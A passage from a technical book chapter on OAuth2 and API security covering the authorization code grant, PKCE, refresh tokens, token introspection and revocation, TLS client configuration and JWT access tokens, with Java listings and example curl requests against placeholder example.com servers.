The client_id parameter
indicates the client.
The scope
parameter
indicates the
requested scope.
Include a random
state parameter
to prevent CSRF
attacks.
Use the response_type parameter
to obtain an authorization code.
The client’s redirection
endpoint
233
The Authorization Code grant
Once the user has authenticated in their browser, the AS will typically display a
page telling the user which client is requesting access and the scope it requires, such
as that shown in figure 7.6. The user is then given an opportunity to accept or decline
the request, or possibly to adjust the scope of access that they are willing to grant. If
the user approves, then the AS will issue an HTTP redirect to a URI controlled by the
client application with the authorization code and the original state value as a query
parameter:
HTTP/1.1 303 See Other
Location: https://client.example.net/callback?
➥ code=kdYfMS7H3sOO5y_sKhpdV6NFfik
➥ &state=t9kWoBWsYjbsNwY0ACJj0A
Because the authorization code is included in the query parameters of the redirect,
it’s vulnerable to being stolen by malicious scripts running in the browser or leaking
in server access logs, browser history, or through the HTTP Referer header. To pro-
tect against this, the authorization code is usually only valid for a short period of time
and the AS will enforce that it’s used only once. If an attacker tries to use a stolen code
after the legitimate client has used it, then the AS will reject the request and revoke
any access tokens already issued with that code.
The client can then exchange the authorization code for an access token by calling
the token endpoint on the AS. It sends the authorization code in the body of a POST
request, using the application/x-www-form-urlencoded encoding used for HTML
forms, with the following parameters:
Indicate the authorization code grant type is being used by including grant_
type=authorization_code.
The AS redirects to
the client with the
authorization code.
It includes the state parameter
from the original request.
Figure 7.6
An example OAuth2 consent page indicating the name of the client requesting
access and the scope it requires. The user can choose to allow or deny the request.
234
CHAPTER 7
OAuth2 and OpenID Connect
Include the client ID in the client_id parameter or supply client credentials to
identify the client.
Include the redirect URI that was used in the original request in the redirect
_uri parameter.
Finally, include the authorization code as the value of the code parameter.
This is a direct HTTPS call from the client to the AS rather than a redirect in the web
browser, and so the access token returned to the client is protected against theft or
tampering. An example request to the token endpoint looks like the following:
POST /token HTTP/1.1
Host: as.example.com
Content-Type: application/x-www-form-urlencoded
Authorization: Basic dGVzdDpwYXNzd29yZA==
grant_type=authorization_code&
code=kdYfMS7H3sOO5y_sKhpdV6NFfik&
redirect_uri=https://client.example.net/callback
If the authorization code is valid and has not expired, then the AS will respond with
the access token in a JSON response, along with some (optional) details about the
scope and expiry time of the token:
HTTP/1.1 200 OK
Content-Type: application/json
{
"access_token":"QdT8POxT2SReqKNtcRDicEgIgkk",
"scope":"post_message read_messages",
"token_type":"Bearer",
"expires_in":3599}
If the client is confidential, then it must authenticate to the token endpoint when it
exchanges the authorization code. In the most common case, this is done by includ-
ing the client ID and client secret as a username and password using HTTP Basic
authentication, but alternative authentication methods are allowed, such as using a
JWT or TLS client certificate. Authenticating to the token endpoint prevents a mali-
cious client from using a stolen authorization code to obtain an access token.
Once the client has obtained an access token, it can use it to access the APIs on the
resource server by including it in an Authorization: Bearer header just as you’ve
done in previous chapters. You’ll see how to validate an access token in your API in
section 7.4.
Supply client credentials
for a confidential client.
Include the grant type
and authorization code.
Provide the redirect URI that
was used in the original request.
The access token
The scope of the access
token, which may be
different than requested
The number of seconds until
the access token expires
235
The Authorization Code grant
7.3.1
Redirect URIs for different types of clients
The choice of redirect URI is an important security consideration for a client. For
public clients that don’t authenticate to the AS, the redirect URI is the only measure
by which the AS can be assured that the authorization code is sent to the right client.
If the redirect URI is vulnerable to interception, then an attacker may steal authoriza-
tion codes.
For a traditional web application, it’s simple to create a dedicated endpoint to use
for the redirect URI to receive the authorization code. For a single-page app, the redi-
rect URI should be the URI of the app from which client-side JavaScript can then
extract the authorization code and make a CORS request to the token endpoint.
For mobile applications, there are two primary options:
The application can register a private-use URI scheme with the mobile operat-
ing system, such as myapp:/ /callback. When the AS redirects to myapp:/ /
callback?code=… in the system web browser, the operating system will launch
the native app and pass it the callback URI. The native application can then
extract the authorization code from this URI and call the token endpoint.
An alternative is to register a portion of the path on the web domain of the app
producer. For example, your app could register with the operating system that
it will handle all requests to https:/ /example.com/app/callback. When the
AS redirects to this HTTPS endpoint, the mobile operating system will launch
the native app just as for a private-use URI scheme. Android calls this an App Link
(https://developer.android.com/training/app-links/), while on iOS they are
known as Universal Links (https://developer.apple.com/ios/universal-links/).
A drawback with private-use URI schemes is that any app can register to handle any
URI scheme, so a malicious application could register the same scheme as your legiti-
mate client. If a user has the malicious application installed, then the redirect from
the AS with an authorization code may cause the malicious application to be activated
rather than your legitimate application. Registered HTTPS redirect URIs on Android
(App Links) and iOS (Universal Links) avoid this problem because an app can only
claim part of the address space of a website if the website in question publishes a JSON
document explicitly granting permission to that app. For example, to allow your iOS
app to handle requests to https:/ /example.com/app/callback, you would publish the
following JSON file to https:/ /example.com/.well-known/apple-app-site-association:
{
"applinks": {
"apps": [],
"details": [
{ "appID": "9JA89QQLNQ.com.example.myapp",
"paths": ["/app/callback"] }]
}
}
The ID of your app in
the Apple App Store
The paths on the
server that the app
can intercept
236
CHAPTER 7
OAuth2 and OpenID Connect
The process is similar for Android apps. This prevents a malicious app from claiming
the same redirect URI, which is why HTTPS redirects are recommended by the
OAuth Native Application Best Common Practice document (https://tools.ietf.org/
html/rfc8252#section-7.2).
For desktop and command-line applications, both Mac OS X and Windows sup-
port registering private-use URI schemes but not claimed HTTPS URIs at the time of
writing. For non-native apps and scripts that cannot register a private URI scheme, the
recommendation is that the application starts a temporary web server listening on the
local loopback device (that is, http:/ /127.0.0.1) on a random port, and uses that as its
redirect URI. Once the authorization code is received from the AS, the client can shut
down the temporary web server.
7.3.2
Hardening code exchange with PKCE
Before the invention of claimed HTTPS redirect URIs, mobile applications using
private-use URI schemes were vulnerable to code interception by a malicious app reg-
istering the same URI scheme, as described in the previous section. To protect against
this attack, the OAuth working group developed the PKCE standard (Proof Key for
Code Exchange; https://tools.ietf.org/html/rfc7636), pronounced “pixy.” Since then,
formal analysis of the OAuth protocol has identified a few theoretical attacks against
the authorization code flow. For example, an attacker may be able to obtain a genuine
authorization code by interacting with a legitimate client and then using an XSS
attack against a victim to replace their authorization code with the attacker’s. Such
an attack would be quite difficult to pull off but is theoretically possible. It’s there-
fore recommended that all types of clients use PKCE to strengthen the authoriza-
tion code flow.
The way PKCE works for a client is quite simple. Before the client redirects the
user to the authorization endpoint, it generates another random value, known as the
PKCE code verifier. This value should be generated with high entropy, such as a 32-byte
value from a SecureRandom object in Java; the PKCE standard requires that the
encoded value is at least 43 characters long and a maximum of 128 characters from a
restricted set of characters. The client stores the code verifier locally, alongside the
state parameter. Rather than sending this value directly to the AS, the client first
hashes7 it using the SHA-256 cryptographic hash function to create a code challenge
(listing 7.4). The client then adds the code challenge as another query parameter
when redirecting to the authorization endpoint.
7 There is an alternative method in which the client sends the original verifier as the challenge, but this is less
secure.
237
The Authorization Code grant
String addPkceChallenge(spark.Request request,
String authorizeRequest) throws Exception {
var secureRandom = new java.security.SecureRandom();
var encoder = java.util.Base64.getUrlEncoder().withoutPadding();
var verifierBytes = new byte[32];
secureRandom.nextBytes(verifierBytes);
var verifier = encoder.encodeToString(verifierBytes);
request.session(true).attribute("verifier", verifier);
var sha256 = java.security.MessageDigest.getInstance("SHA-256");
var challenge = encoder.encodeToString(
sha256.digest(verifier.getBytes("UTF-8")));
return authorizeRequest +
"&code_challenge=" + challenge +
"&code_challenge_method=S256";
}
Later, when the client exchanges the authorization code at the token endpoint, it
sends the original (unhashed) code verifier in the request. The AS will check that the
SHA-256 hash of the code verifier matches the code challenge that it received in the
authorization request. If they differ, then it rejects the request. PKCE is very secure,
because even if an attacker intercepts both the redirect to the AS and the redirect
back with the authorization code, they are not able to use the code because they can-
not compute the correct code verifier. Many OAuth2 client libraries will automatically
compute PKCE code verifiers and challenges for you, and it significantly improves the
security of the authorization code grant so you should always use it when possible.
Authorization servers that don’t support PKCE should ignore the additional query
parameters, because this is required by the OAuth2 standard.
7.3.3
Refresh tokens
In addition to an access token, the AS may also issue the client with a refresh token at the
same time. The refresh token is returned as another field in the JSON response from
the token endpoint, as in the following example:
$ curl -d 'grant_type=password
➥ &scope=read_messages+post_message
➥ &username=demo&password=changeit'
➥ -u test:password
➥ https://as.example.com:8443/oauth2/access_token
{
"access_token":"B9KbdZYwajmgVxr65SzL-z2Dt-4",
"refresh_token":"sBac5bgCLCjWmtjQ8Weji2mCrbI",
"scope":"post_message read_messages",
"token_type":"Bearer","expires_in":3599}
Listing 7.4
Computing a PKCE code challenge
Create a
random code
verifier string.
Store the
verifier in a
session
cookie or
other local
storage.
Create a code
challenge as
the SHA-256
hash of the
code verifier
string.
Include the code challenge
in the redirect to the AS
authorization endpoint.
A refresh
token
238
CHAPTER 7
OAuth2 and OpenID Connect
When the access token expires, the client can then use the refresh token to obtain a
fresh access token from the AS without the resource owner needing to approve the
request again. Because the refresh token is sent only over a secure channel between
the client and the AS, it’s considered more secure than an access token that might be
sent to many different APIs.
DEFINITION
A client can use a refresh token to obtain a fresh access token when
the original one expires. This allows an AS to issue short-lived access tokens
without clients having to ask the user for a new token every time it expires.
By issuing a refresh token, the AS can limit the lifetime of access tokens. This has a
minor security benefit because if an access token is stolen, then it can only be used for
a short period of time. But in practice, a lot of damage could be done even in a short
space of time by an automated attack, such as the Facebook attack discussed in chap-
ter 6 (https://newsroom.fb.com/news/2018/09/security-update/). The primary ben-
efit of refresh tokens is to allow the use of stateless access tokens such as JWTs. If the
access token is short-lived, then the client is forced to periodically refresh the token at
the AS, providing an opportunity for the token to be revoked without the AS main-
taining a large blocklist. The complexity of revocation is effectively pushed to the cli-
ent, which must now handle periodically refreshing its access tokens.
To refresh an access token, the client calls the AS token endpoint passing in the
refresh token, using the refresh token grant, and sending the refresh token and any cli-
ent credentials, as in the following example:
$ curl -d 'grant_type=refresh_token
➥ &refresh_token=sBac5bgCLCjWmtjQ8Weji2mCrbI'
➥ -u test:password
➥ https://as.example.com:8443/oauth2/access_token
{
"access_token":"snGxj86QSYB7Zojt3G1b2aXN5UM",
"scope":"post_message read_messages",
"token_type":"Bearer","expires_in":3599}
The AS can often be configured to issue a new refresh token at the same time (revok-
ing the old one), enforcing that each refresh token is used only once. This can be
used to detect refresh token theft: when the attacker uses the refresh token, it will stop
working for the legitimate client.
Pop quiz
4
Which type of URI should be preferred as the redirect URI for a mobile client?
a
A claimed HTTPS URI
b
A private-use URI scheme such as myapp:/ /cb
Use the refresh token
grant and supply the
refresh token.
Include client
credentials if using a
confidential client.
The AS returns a
fresh access token.
239
Validating an access token
7.4
Validating an access token
Now that you’ve learned how to obtain an access token for a client, you need to
learn how to validate the token in your API. In previous chapters, it was simple to look
up a token in the local token database. For OAuth2, this is no longer quite so simple
when tokens are issued by the AS and not by the API. Although you could share a
token database between the AS and each API, this is not desirable because sharing
database access increases the risk of compromise. An attacker can try to access the
database through any of the connected systems, increasing the attack surface. If just
one API connected to the database has a SQL injection vulnerability, this would
compromise the security of all.
Originally, OAuth2 didn’t provide a solution to this problem and left it up to the
AS and resource servers to decide how to coordinate to validate tokens. This changed
with the publication of the OAuth2 Token Introspection standard (https://tools.ietf
.org/html/rfc7662) in 2015, which describes a standard HTTP endpoint on the AS
that the RS can call to validate an access token and retrieve details about its scope and
resource owner. Another popular solution is to use JWTs as the format for access
tokens, allowing the RS to locally validate the token and extract required details from
the embedded JSON claims. You’ll learn how to use both mechanisms in this section.
7.4.1
Token introspection
To validate an access token using token introspection, you simply make a POST
request to the introspection endpoint of the AS, passing in the access token as a param-
eter. You can discover the introspection endpoint using the method in section 7.2.3 if
the AS supports discovery. The AS will usually require your API (acting as the resource
server) to register as a special kind of client and receive client credentials to call the
endpoint. The examples in this section will assume that the AS requires HTTP Basic
authentication because this is the most common requirement, but you should check
the documentation for your AS to determine how the RS must authenticate.
TIP
To avoid historical issues with ambiguous character sets, OAuth requires
that HTTP Basic authentication credentials are first URL-encoded (as UTF-8)
before being Base64-encoded.
Listing 7.5 shows the constructor and imports for a new token store that will use
OAuth2 token introspection to validate an access token. You’ll implement the remain-
ing methods in the rest of this section. The create and revoke methods throw an
exception, effectively disabling the login and logout endpoints at the API, forcing
5
True or False: The authorization code grant should always be used in combina-
tion with PKCE.
The answers are at the end of the chapter.
240
CHAPTER 7
OAuth2 and OpenID Connect
clients to obtain access tokens from the AS. The new store takes the URI of the token
introspection endpoint, along with the credentials to use to authenticate. The creden-
tials are encoded into an HTTP Basic authentication header ready to be used. Navi-
gate to src/main/java/com/manning/apisecurityinaction/token and create a new
file named OAuth2TokenStore.java. Type in the contents of listing 7.5 in your editor
and save the new file.
package com.manning.apisecurityinaction.token;
import org.json.JSONObject;
import spark.Request;
import java.io.IOException;
import java.net.*;
import java.net.http.*;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import java.time.Instant;
import java.time.temporal.ChronoUnit;
import java.util.*;
import static java.nio.charset.StandardCharsets.UTF_8;
public class OAuth2TokenStore implements SecureTokenStore {
private final URI introspectionEndpoint;
private final String authorization;
private final HttpClient httpClient;
public OAuth2TokenStore(URI introspectionEndpoint,
String clientId, String clientSecret) {
this.introspectionEndpoint = introspectionEndpoint;
var credentials = URLEncoder.encode(clientId, UTF_8) + ":" +
URLEncoder.encode(clientSecret, UTF_8);
this.authorization = "Basic " + Base64.getEncoder()
.encodeToString(credentials.getBytes(UTF_8));
this.httpClient = HttpClient.newHttpClient();
}
@Override
public String create(Request request, Token token) {
throw new UnsupportedOperationException();
}
@Override
public void revoke(Request request, String tokenId) {
throw new UnsupportedOperationException();
}
}
Listing 7.5
The OAuth2 token store
Inject the URI
of the token
introspection
endpoint.
Build up HTTP
Basic credentials
from the client
ID and secret.
Throw an
exception to
disable direct
login and
logout.
241
Validating an access token
To validate a token, you then need to make a POST request to the introspection end-
point passing the token. You can use the HTTP client library in java.net.http, which
was added in Java 11 (for earlier versions, you can use Apache HttpComponents,
https://hc.apache.org/httpcomponents-client-ga/). Because the token is untrusted
before the call, you should first validate it to ensure that it conforms to the allowed
syntax for access tokens. As you learned in chapter 2, it’s important to always validate
all inputs, and this is especially important when the input will be included in a call to
another system. The standard doesn’t specify a maximum size for access tokens, but
you should enforce a limit of around 1KB or less, which should be enough for most
token formats (if the access token is a JWT, it could get quite large and you may need
to increase that limit). The token should then be URL-encoded to include in the
POST body as the token parameter. It’s important to properly encode parameters
when calling another system to prevent an attacker being able to manipulate the con-
tent of the request (see section 2.6 of chapter 2). You can also include a token_
type_hint parameter to indicate that it’s an access token, but this is optional.
TIP
To avoid making an HTTP call every time a client uses an access token
with your API, you can cache the response for a short period of time, indexed
by the token. The longer you cache the response, the longer it may take your
API to find out that a token has been revoked, so you should balance perfor-
mance against security based on your threat model.
If the introspection call is successful, the AS will return a JSON response indicating
whether the token is valid and metadata about the token, such as the resource owner
and scope. The only required field in this response is a Boolean active field, which
indicates whether the token should be considered valid. If this is false then the token
should be rejected, as in listing 7.6. You’ll process the rest of the JSON response
shortly, but for now open OAuth2TokenStore.java in your editor again and add the
implementation of the read method from the listing.
@Override
public Optional<Token> read(Request request, String tokenId) {
if (!tokenId.matches("[\\x20-\\x7E]{1,1024}")) {
return Optional.empty();
}
var form = "token=" + URLEncoder.encode(tokenId, UTF_8) +
"&token_type_hint=access_token";
var httpRequest = HttpRequest.newBuilder()
.uri(introspectionEndpoint)
.header("Content-Type", "application/x-www-form-urlencoded")
.header("Authorization", authorization)
.POST(BodyPublishers.ofString(form))
.build();
Listing 7.6
Introspecting an access token
Validate the
token first.
Encode the
token into the
POST form body.
Call the introspection
endpoint using your
client credentials.
242
CHAPTER 7
OAuth2 and OpenID Connect
try {
var httpResponse = httpClient.send(httpRequest,
BodyHandlers.ofString());
if (httpResponse.statusCode() == 200) {
var json = new JSONObject(httpResponse.body());
if (json.getBoolean("active")) {
return processResponse(json);
}
}
} catch (IOException e) {
throw new RuntimeException(e);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new RuntimeException(e);
}
return Optional.empty();
}
Several optional fields are allowed in the JSON response, including all valid JWT
claims (see chapter 6). The most important fields are listed in table 7.1. Because all
these fields are optional, you should be prepared for them to be missing. This is an
unfortunate aspect of the specification, because there is often no alternative but to
reject a token if its scope or resource owner cannot be established. Thankfully, most
AS software generates sensible values for these fields.
Listing 7.7 shows how to process the remaining JSON fields by extracting the resource
owner from the sub field, the expiry time from the exp field, and the scope from the
scope field. You can also extract other fields of interest, such as the client_id, which
can be useful information to add to audit logs. Open OAuth2TokenStore.java again
and add the processResponse method from the listing.
Table 7.1
Token introspection response fields
Field
Description
scope
The scope of the token as a string. If multiple scopes are specified then they are sepa-
rated by spaces, such as "read_messages post_message".
sub
An identifier for the resource owner (subject) of the token. This is a unique identifier,
not necessarily human-readable.
username
A human-readable username for the resource owner.
client_id
The ID of the client that requested the token.
exp
The expiry time of the token, in seconds from the UNIX epoch.
Check that the
token is still active.
243
Validating an access token
private Optional<Token> processResponse(JSONObject response) {
var expiry = Instant.ofEpochSecond(response.getLong("exp"));
var subject = response.getString("sub");
var token = new Token(expiry, subject);
token.attributes.put("scope", response.getString("scope"));
token.attributes.put("client_id",
response.optString("client_id"));
return Optional.of(token);
}
Although you used the sub field to extract an ID for the user, this may not always be
appropriate. The authenticated subject of a token needs to match the entries in the
users and permissions tables in the database that define the access control lists for
Natter social spaces. If these don’t match, then the requests from a client will be
denied even if they have a valid access token. You should check the documentation for
your AS to see which field to use to match your existing user IDs.
You can now switch the Natter API to use OAuth2 access tokens by changing the
TokenStore in Main.java to use the OAuth2TokenStore, passing in the URI of your
AS’s token introspection endpoint and the client ID and secret that you registered for
the Natter API (see appendix A for instructions):
var introspectionEndpoint =
URI.create("https://as.example.com:8443/oauth2/introspect");
SecureTokenStore tokenStore = new OAuth2TokenStore(
introspectionEndpoint, clientId, clientSecret);
var tokenController = new TokenController(tokenStore);
You should make sure that the AS and the API have the same users and that the AS
communicates the username to the API in the sub or username fields from the intro-
spection response. Otherwise, the API may not be able to match the username
returned from token introspection to entries in its access control lists (chapter 3). In
many corporate environments, the users will not be stored in a local database but
instead in a shared LDAP directory that is maintained by a company’s IT department
that both the AS and the API have access to, as shown in figure 7.7.
In other cases, the AS and the API may have different user databases that use dif-
ferent username formats. In this case, the API will need some logic to map the user-
name returned by token introspection into a username that matches its local database
and ACLs. For example, if the AS returns the email address of the user, then this
could be used to search for a matching user in the local user database. In more loosely
coupled architectures, the API may rely entirely on the information returned from
the token introspection endpoint and not have access to a user database at all.
Listing 7.7
Processing the introspection response
Extract token
attributes
from the
relevant
fields in the
response.
Construct the token
store, pointing at
your AS.
244
CHAPTER 7
OAuth2 and OpenID Connect
Once the AS and the API are on the same page about usernames, you can obtain an
access token from the AS and use it to access the Natter API, as in the following exam-
ple using the ROPC grant:
$ curl -u test:password \
-d 'grant_type=password&scope=create_space+post_message
➥ &username=demo&password=changeit' \
https://openam.example.com:8443/openam/oauth2/access_token
{"access_token":"_Avja0SO-6vAz-caub31eh5RLDU",
"scope":"post_message create_space",
"token_type":"Bearer","expires_in":3599}
$ curl -H 'Content-Type: application/json' \
-H 'Authorization: Bearer _Avja0SO-6vAz-caub31eh5RLDU' \
-d '{"name":"test","owner":"demo"}' https://localhost:4567/spaces
{"name":"test","uri":"/spaces/1"}
Attempting to perform an action that is not allowed by the scope of the access token
will result in a 403 Forbidden error due to the access control filters you added at the
start of this chapter:
$ curl -i -H 'Authorization: Bearer _Avja0SO-6vAz-caub31eh5RLDU' \
https://localhost:4567/spaces/1/messages
HTTP/1.1 403 Forbidden
LDAP user
directory
Authorization server
API
Access control
list
Token
introspection
user=alice, permissions=rw
user=alice,name=Alice,address=...
In a corporate environment, the AS
and the API may both have access
to a shared LDAP user directory.
"sub":"alice"
The username communicated in token
introspection must match the LDAP
username and entries in the API’s ACL.
Figure 7.7
In many environments, the AS and the API will both have access
to a corporate LDAP directory containing details of all users. In this case,
the AS needs to communicate the username to the API so that it can find
the matching user entry in LDAP and in its own access control lists.
Obtain an access
token using ROPC
grant.
Use the access
token to perform
actions with the
Natter API.
The request is forbidden.
245
Validating an access token
Date: Mon, 01 Jul 2019 10:22:17 GMT
WWW-Authenticate: Bearer
➥ error="insufficient_scope",scope="list_messages"
7.4.2
Securing the HTTPS client configuration
Because the API relies entirely on the AS to tell it if an access token is valid, and the
scope of access it should grant, it’s critical that the connection between the two be
secure. While this connection should always be over HTTPS, the default connection
settings used by Java are not as secure as they could be:
The default settings trust server certificates signed by any of the main public
certificate authorities (CAs). Typically, the AS will be running on your own
internal network and issued with a certificate by a private CA for your organiza-
tion, so it’s unnecessary to trust all of these public CAs.
The default TLS settings include a wide variety of cipher suites and protocol ver-
sions for maximum compatibility. Older versions of TLS, and some cipher
suites, have known security weaknesses that should be avoided where possible.
You should disable these less secure options and re-enable them only if you
must talk to an old server that cannot be upgraded.
The latest and most secure version of TLS is version 1.3, which was released in August
2018. This replaced TLS 1.2, released exactly a decade earlier. While TLS 1.3 is a sig-
nificant improvement over earlier versions of the protocol, it’s not yet so widely
adopted that support for TLS 1.2 can be dropped completely. TLS 1.2 is still a very
TLS cipher suites
A TLS cipher suite is a collection of cryptographic algorithms that work together to cre-
ate the secure channel between a client and a server. When a TLS connection is first
established, the client and server perform a handshake, in which the server authen-
ticates to the client, the client optionally authenticates to the server, and they agree
upon a session key to use for subsequent messages. The cipher suite specifies the
algorithms to be used for authentication, key exchange, and the block cipher and
mode of operation to use for encrypting messages. The cipher suite to use is nego-
tiated as the first part of the handshake.
For example, the TLS 1.2 cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
specifies that the two parties will use the Elliptic Curve Diffie-Hellman (ECDH) key
agreement algorithm (using ephemeral keys, indicated by the final E), with RSA sig-
natures for authentication, and the agreed session key will be used to encrypt mes-
sages using AES in Galois/Counter Mode. (SHA-256 is used as part of the key
agreement.)
In TLS 1.3, cipher suites only specify the block cipher and hash function used, such
as TLS_AES_128_GCM_SHA256. The key exchange and authentication algorithms are
negotiated separately.
The error message
tells the client the
scope it requires.
246
CHAPTER 7
OAuth2 and OpenID Connect
secure protocol, but for maximum security you should prefer cipher suites that offer
forward secrecy and avoid older algorithms that use AES in CBC mode, because these
are more prone to attacks. Mozilla provides recommendations for secure TLS configu-
ration options (https://wiki.mozilla.org/Security/Server_Side_TLS), along with a tool
for automatically generating configuration files for various web servers, load balanc-
ers, and reverse proxies. The configuration used in this section is based on Mozilla’s
Intermediate settings. If you know that your AS software is capable of TLS 1.3, then
you could opt for the Modern settings and remove the TLS 1.2 support.
DEFINITION
A cipher suite offers forward secrecy if the confidentiality of data
transmitted using that cipher suite is protected even if one or both of the par-
ties are compromised afterwards. All cipher suites provide forward secrecy in
TLS 1.3. In TLS 1.2, these cipher suites start with TLS_ECDHE_ or TLS_DHE_.
To configure the connection to trust only the CA that issued the server certificate used
by your AS, you need to create a javax.net.ssl.TrustManager that has been initial-
ized with a KeyStore that contains only that one CA certificate. For example, if you’re
using the mkcert utility from chapter 3 to generate the certificate for your AS, then
you can use the following command to import the root CA certificate into a keystore:
$ keytool -import -keystore as.example.com.ca.p12 \
-alias ca -file "$(mkcert -CAROOT)/rootCA.pem"
This will ask you whether you want to trust the root CA certificate and then ask you for
a password for the new keystore. Accept the certificate and type in a suitable password,
then copy the generated keystore into the Natter project root directory.
Certificate chains
When configuring the trust store for your HTTPS client, you could choose to directly
trust the server certificate for that server. Although this seems more secure, it means
that whenever the server changes its certificate, the client would need to be updated
to trust the new one. Many server certificates are valid for only 90 days. If the server
is ever compromised, then the client will continue trusting the compromised certifi-
cate until it’s manually updated to remove it from the trust store.
To avoid these problems, the server certificate is signed by a CA, which itself has a
(self-signed) certificate. When a client connects to the server it receives the server’s
current certificate during the handshake. To verify this certificate is genuine, it looks
up the corresponding CA certificate in the client trust store and checks that the server
certificate was signed by that CA and is not expired or revoked.
In practice, the server certificate is often not signed directly by the CA. Instead, the
CA signs certificates for one or more intermediate CAs, which then sign server certif-
icates. The client may therefore have to verify a chain of certificates until it finds a
certificate of a root CA that it trusts directly. Because CA certificates might them-
selves be revoked or expire, in general the client may have to consider multiple possible
247
Validating an access token
In Java, overall TLS settings can be configured explicitly using the javax.net.ssl.SSL-
Parameters class8 (listing 7.8). First construct a new instance of the class, and then
use the setter methods such as setCipherSuites(String[])that allows TLS versions
and cipher suites. The configured parameters can then be passed when building the
HttpClient object. Open OAuth2TokenStore.java in your editor and update the con-
structor to configure secure TLS settings.
import javax.net.ssl.*;
import java.security.*;
import java.net.http.*;
var sslParams = new SSLParameters();
sslParams.setProtocols(
new String[] { "TLSv1.3", "TLSv1.2" });
sslParams.setCipherSuites(new String[] {
"TLS_AES_128_GCM_SHA256",
"TLS_AES_256_GCM_SHA384",
"TLS_CHACHA20_POLY1305_SHA256",
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256",
"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256"
});
sslParams.setUseCipherSuitesOrder(true);
sslParams.setEndpointIdentificationAlgorithm("HTTPS");
try {
var trustedCerts = KeyStore.getInstance("PKCS12");
trustedCerts.load(
new FileInputStream("as.example.com.ca.p12"),
"changeit".toCharArray());
var tmf = TrustManagerFactory.getInstance("PKIX");
tmf.init(trustedCerts);
var sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, tmf.getTrustManagers(), null);
this.httpClient = HttpClient.newBuilder()
.sslParameters(sslParams)
.sslContext(sslContext)
.build();
certificate chains before it finds a valid one. Verifying a certificate chain is complex
and error-prone with many subtle details so you should always use a mature library
to do this.
8 Recall from chapter 3 that earlier versions of TLS were called SSL, and this terminology is still widespread.
Listing 7.8
Securing the HTTPS connection
Allow only TLS
1.2 or TLS 1.3.
Configure secure cipher
suites for TLS 1.3 . . .
. . . and for
TLS 1.2.
The SSLContext
should be configured
to trust only the CA
used by your AS.
Initialize the HttpClient with
the chosen TLS parameters.
248
CHAPTER 7
OAuth2 and OpenID Connect
} catch (GeneralSecurityException | IOException e) {
throw new RuntimeException(e);
}
7.4.3
Token revocation
Just as for token introspection, there is an OAuth2 standard for revoking an access
token (https://tools.ietf.org/html/rfc7009). While this could be used to implement
the revoke method in the OAuth2TokenStore, the standard only allows the client that
was issued a token to revoke it, so the RS (the Natter API in this case) cannot revoke a
token on behalf of a client. Clients should directly call the AS to revoke a token, just as
they do to get an access token in the first place.
Revoking a token follows the same pattern as token introspection: the client makes
a POST request to a revocation endpoint at the AS, passing in the token in the request
body, as shown in listing 7.9. The client should include its client credentials to authen-
ticate the request. Only an HTTP status code is returned, so there is no need to parse
the response body.
package com.manning.apisecurityinaction;
import java.net.*;
import java.net.http.*;
import java.net.http.HttpResponse.BodyHandlers;
import java.util.Base64;
import static java.nio.charset.StandardCharsets.UTF_8;
public class RevokeAccessToken {
private static final URI revocationEndpoint =
URI.create("https://as.example.com:8443/oauth2/token/revoke");
public static void main(String...args) throws Exception {
if (args.length != 3) {
throw new IllegalArgumentException(
"RevokeAccessToken clientId clientSecret token");
}
var clientId = args[0];
var clientSecret = args[1];
var token = args[2];
var credentials = URLEncoder.encode(clientId, UTF_8) +
":" + URLEncoder.encode(clientSecret, UTF_8);
var authorization = "Basic " + Base64.getEncoder()
.encodeToString(credentials.getBytes(UTF_8));
var httpClient = HttpClient.newHttpClient();
Listing 7.9
Revoking an OAuth access token
Encode the
client’s credentials
for Basic
authentication.
249
Validating an access token
var form = "token=" + URLEncoder.encode(token, UTF_8) +
"&token_type_hint=access_token";
var httpRequest = HttpRequest.newBuilder()
.uri(revocationEndpoint)
.header("Content-Type",
"application/x-www-form-urlencoded")
.header("Authorization", authorization)
.POST(HttpRequest.BodyPublishers.ofString(form))
.build();
httpClient.send(httpRequest, BodyHandlers.discarding());
}
}
7.4.4
JWT access tokens
Though token introspection solves the problem of how the API can determine if an
access token is valid and the scope associated with that token, it has a downside: the
API must make a call to the AS every time it needs to validate a token. An alternative is
to use a self-contained token format such as JWTs that were covered in chapter 6. This
allows the API to validate the access token locally without needing to make an HTTPS
call to the AS. While there is not yet a standard for JWT-based OAuth2 access tokens
(although one is being developed; see http://mng.bz/5pW4), it’s common for an AS
to support this as an option.
To validate a JWT-based access token, the API needs to first authenticate the JWT
using a cryptographic key. In chapter 6, you used symmetric HMAC or authenticated
encryption algorithms in which the same key is used to both create and verify mes-
sages. This means that any party that can verify a JWT is also able to create one that
will be trusted by all other parties. Although this is suitable when the API and AS exist
Pop quiz
6
Which standard endpoint is used to determine if an access token is valid?
a
The access token endpoint
b
The authorization endpoint
c
The token revocation endpoint
d
The token introspection endpoint
7
Which parties are allowed to revoke an access token using the standard revoca-
tion endpoint?
a
Anyone
b
Only a resource server
c
Only the client the token was issued to
d
A resource server or the client the token was issued to
The answers are at the end of the chapter.
Create the
POST body
using URL-
encoding for
the token.
Include the client
credentials in the
revocation
request.
250
CHAPTER 7
OAuth2 and OpenID Connect
within the same trust boundary, it becomes a security risk when the APIs are in differ-
ent trust boundaries. For example, if the AS is in a different datacenter to the API, the
key must now be shared between those two datacenters. If there are many APIs that
need access to the shared key, then the security risk increases even further because an
attacker that compromises any API can then create access tokens that will be accepted
by all of them.
To avoid these problems, the AS can switch to public key cryptography using digi-
tal signatures, as shown in figure 7.8. Rather than having a single shared key, the AS
instead has a pair of keys: a private key and a public key. The AS can sign a JWT using
the private key, and then anybody with the public key can verify that the signature is
genuine. However, the public key cannot be used to create a new signature and so it’s
safe to share the public key with any API that needs to validate access tokens. For this
reason, public key cryptography is also known as asymmetric cryptography, because the
holder of a private key can perform different operations to the holder of a public key.
Given that only the AS needs to create new access tokens, using public key cryptogra-
phy for JWTs enforces the principle of least authority (POLA; see chapter 2) as it
ensures that APIs can only verify access tokens and not create new ones.
